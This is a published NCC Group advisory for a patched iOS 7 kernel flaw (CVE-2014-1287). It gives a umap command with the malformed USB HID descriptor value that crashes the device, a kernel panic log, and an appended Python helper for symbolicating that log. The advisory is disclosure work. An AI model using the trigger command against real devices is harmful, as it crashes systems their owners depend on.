~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Vulnerability Summary
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Title              iOS 7 arbitrary code execution in kernel mode
Release Date       14 March 2014
Reference          NGS00596
Discoverer         Andy Davis
Vendor             Apple
Vendor Reference   600217059
Systems Affected   iPhone 4 and later, iPod touch (5th generation) and later,
                   iPad 2 and later
CVE Reference      CVE-2014-1287
Risk               High
Status             Fixed
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Resolution Timeline
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Discovered         26 September 2013
Reported           26 September 2013
Released           26 September 2013
Fixed              10 March 2014
Published          14 March 2014
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Vulnerability Description
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
When a specific value is supplied in the USB Endpoint descriptor for a HID
device, the Apple device kernel panics and reboots.
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
The bug can be triggered using umap (https://github.com/nccgroup/umap)
as follows:

    sudo python3 ./umap.py -P /dev/ttyUSB0 -s 09:00:00:E:46

    bMaxPacketSize = 0xff

Incident Identifier: F0856C91-7616-4DAC-9907-C504401D9951
CrashReporter Key:   7ed804add6a0507b6a8ca9625f0bcd14abc6801b
Hardware Model:      iPhone3,1
Date/Time:           2013-09-26 12:35:46.892 +0100
OS Version:          iOS 7.0 (11A465)

panic(cpu 0 caller 0x882220a5): kernel abort type 4: fault_type=0x1,
fault_addr=0x28
r0:   0x00000003  r1: 0x889e70bd  r2:  0x00000012  r3:  0xfffffffe
r4:   0x9ae83000  r5: 0x00000003  r6:  0x00000000  r7:  0x87ff3d78
r8:   0x00000000  r9: 0x00000000  r10: 0x00000000  r11: 0x00000001
r12:  0x87ff3d50  sp: 0x87ff3d10  lr:  0x88af52bf  pc:  0x88af51f8
cpsr: 0x80000033 fsr: 0x00000005 far: 0x00000028

Debugger message: panic
OS version: 11A465
Kernel version: Darwin Kernel Version 14.0.0: Tue Aug 13 21:39:05 PDT 2013;
root:xnu-2423.1.73~3/RELEASE_ARM_S5L8930X
iBoot version: iBoot-1940.1.75
secure boot?: YES
Paniclog version: 1
Kernel slide:     0x0000000008200000
Kernel text base: 0x88201000
Epoch Time:  sec        usec
  Boot:      0x52441b69 0x00000000
  Sleep:     0x00000000 0x00000000
  Wake:      0x00000000 0x00000000
  Calendar:  0x52441bb5 0x00056497

Panicked task 0x896f8d48: 12856 pages, 114 threads: pid 0: kernel_task
panicked thread: 0x8023de90, backtrace: 0x87ff3a48
    lr: 0x88317889  fp: 0x87ff3a7c
    lr: 0x883181f7  fp: 0x87ff3ab0
    lr: 0x882b783b  fp: 0x87ff3ad4
    lr: 0x882220a5  fp: 0x87ff3ba0
    lr: 0x8821c7c4  fp: 0x87ff3d78
    lr: 0x88af8687  fp: 0x87ff3da8
    lr: 0x8828b5bd  fp: 0x87ff3dd0
    lr: 0x889d6d29  fp: 0x87ff3df0
    lr: 0x889da2f3  fp: 0x87ff3e18
    lr: 0x8828b5bd  fp: 0x87ff3e40
    lr: 0x889da14f  fp: 0x87ff3e7c
    lr: 0x88acb8e7  fp: 0x87ff3eb8
    lr: 0x88ac9815  fp: 0x87ff3ed4
    lr: 0x884b24d3  fp: 0x87ff3f60
    lr: 0x882cf869  fp: 0x87ff3fa8
    lr: 0x8821f05c  fp: 0x00000000
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Fix Information
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
A patch can be downloaded from the following location:
http://support.apple.com/kb/HT1222
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
NCC Group
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Research      https://www.nccgroup.com/research
Twitter       https://www.twitter.com/NCCGroupInfoSec / @NCCGroupInfoSec
Open Source   https://github.com/nccgroup
Blog          https://www.nccgroup.com/en/blog/cyber-security/
SlideShare    http://www.slideshare.net/NCC_Group/
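
Added example (not part of the NCC Group advisory): a Python triage helper for the panic log under Technical Details, converting its KASLR-slid addresses to static ones so they can be looked up in a kernel image. It assumes static address = runtime address minus the reported kernel slide, and treats a fault address below one 4 KiB page as a near-NULL access; the function names are illustrative.

```python
import re

# Excerpt of the panic log quoted in the advisory (values copied from the page).
PANIC_LOG = """\
panic(cpu 0 caller 0x882220a5): kernel abort type 4: fault_type=0x1, fault_addr=0x28
r12: 0x87ff3d50  sp: 0x87ff3d10  lr: 0x88af52bf  pc: 0x88af51f8
cpsr: 0x80000033 fsr: 0x00000005 far: 0x00000028
Kernel slide: 0x0000000008200000
Kernel text base: 0x88201000
panicked thread: 0x8023de90, backtrace: 0x87ff3a48
    lr: 0x88317889  fp: 0x87ff3a7c
    lr: 0x883181f7  fp: 0x87ff3ab0
    lr: 0x882b783b  fp: 0x87ff3ad4
"""

PAGE_SIZE = 0x1000  # assumption: faults below one page count as near-NULL


def field(log, name):
    """Return the first hex value following 'name:' or 'name=' in the log."""
    m = re.search(rf"\b{re.escape(name)}\s*[:=]\s*0x([0-9a-fA-F]+)", log)
    if m is None:
        raise ValueError(f"{name} not found in panic log")
    return int(m.group(1), 16)


def unslide(addr, slide):
    """Clear the Thumb bit (bit 0 of a return address) and remove the slide."""
    return (addr & ~1) - slide


def triage(log):
    """Summarise a 32-bit ARM panic log for symbolication."""
    slide = field(log, "Kernel slide")
    frames = re.findall(r"^[ \t]+lr: 0x([0-9a-fA-F]+)[ \t]+fp:", log, re.M)
    return {
        "thumb": bool(field(log, "cpsr") & 0x20),       # CPSR.T set at the fault
        "near_null": field(log, "far") < PAGE_SIZE,     # fault address in page 0
        "static_text_base": field(log, "Kernel text base") - slide,
        "static_pc": unslide(field(log, "pc"), slide),
        "static_frames": [unslide(int(f, 16), slide) for f in frames],
    }


if __name__ == "__main__":
    for key, val in triage(PANIC_LOG).items():
        shown = [hex(v) for v in val] if isinstance(val, list) else val
        print(key, hex(shown) if type(shown) is int else shown)
```

The static addresses are only meaningful against the kernel image for the build named in the log (11A465).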